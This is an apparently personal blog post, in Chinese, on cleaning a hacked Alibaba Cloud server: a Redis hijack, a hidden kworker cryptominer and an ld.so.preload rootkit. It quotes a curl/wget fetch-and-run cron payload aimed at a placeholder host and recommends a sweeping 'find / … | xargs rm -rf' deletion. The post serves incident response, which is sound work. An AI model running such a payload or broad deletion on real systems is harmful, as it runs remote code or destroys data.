【linux】對於服務器被綁，cup100%的問題！

這幾天很蛋疼，很是很是的疼。 阿里雲服務器總被黑，權限也禁了，該弄的都弄了，仍是被黑....

只能怪本身不是個專職的運維...誒...

整體狀態： 服務器被綁，放了後門程序，各類挖礦...喪心病狂...爲何中國這麼不重視互聯網呢?不嘴炮了。

由於我的運維技術不到位，目前只發現一點點蛛絲馬跡...

redis配置文件被篡改, redis被存入curl命令，配置文件被指定寫入路徑。總之，請檢查redis配置文件與dump.rdb文件，與原文件對比是否被篡改了。值得注意的是，log日誌路徑若是是空，基本上說明，redis被綁架了

若是判定redis被綁了，必定要刪除掉redis的鏡像文件。要搜索全盤！就算你不刪除掉，它也會無限讀取鏡像，覆蓋掉你redis中的數據。

/etc/ld.so.preload；這個文件，不管服務器執行什麼命令，它都會先執行一次。很噁心啊。不知道如何搞掉它。 /usr/local/lib/libntp.so；這個文件，是上面/etc/ld.so.preload裏面所指定的一個程序。效果，應該是查看進程時沒法發現cup佔用率，篡改了底層監控什麼什麼的。

這兩個文件，也多是其餘的名稱或路徑....

最後，root用戶下的contab -e ，與/etc/cron.d/root的配置～看一下，是否是已經有你不認識的任務啦？

找到crontab -e 中的地址，找出它所屬的ip，禁掉它。

找到挖礦程序，幹掉它 /etc/rc.d/init.d/kworker /usr/sbin/kworker

再刪掉/etc/ld.so.preload；/usr/local/lib/libntp.so；/etc/rc.d/init.d/kworker；/usr/sbin/kworker以後，深度睡眠的程序會啓動 使用下面命令，查出幹壞事的ip

lsof -c 命令名稱或者絕對路徑 -c apache

禁止某ip訪問或訪問某ip

iptables -A OUTPUT -d 192.168.1.11 -j REJECT

iptables -A INPUT -d 192.168.1.11 -j REJECT

而後再查看一下你的/tmp中，是否有不認識的文件，宰掉～

查找出全部kworker相關的，刪掉

find / -name *kworker* | xargs rm -rf

最後：

systemctl stop kworker.service

systemctl is-enabled kworker.service;echo $?

find / -name *kworker* | xargs rm -rf

若是 /usr/bin/kworkerds 文件還會自動生成，那就給它造個假的，而後0權限。給個無用用戶權限。

刪除掉/etc/cron.d/下的root文件與system文件，這兩個文件應該是罪魁禍首

查看/etc/cron的其餘文件或cron文件夾下的其餘文件。看是否有相似

curl -fsSL https://xxx || wget -q -O- https://xxx|base64 -d |/bin/bash

的內容。

譬如：/etc/crontab；/ect/cron.daily/下的某一文件；等等，全部的定時任務都要檢查。有問題的，比對一下，確認後，幹掉。

還要注意下：是否有這個文件 /usr/bin/httpdns 或 /bin/httpdns ，幹掉

⚠️⚠️ 注意：這個文件夾：/var/spool/cron ，/var/spool/cron/crontabs,這兩個文件夾下的定時文件檢查一下，還隱藏着一個定時的小後門，記得把裏面的定時任務幹掉；不是刪除文件，是刪除定時任務；

以上，基本就能夠解決redis被劫持問題。

時間緊，很少些，至少本身能懂。你們要是看不懂...歡迎提問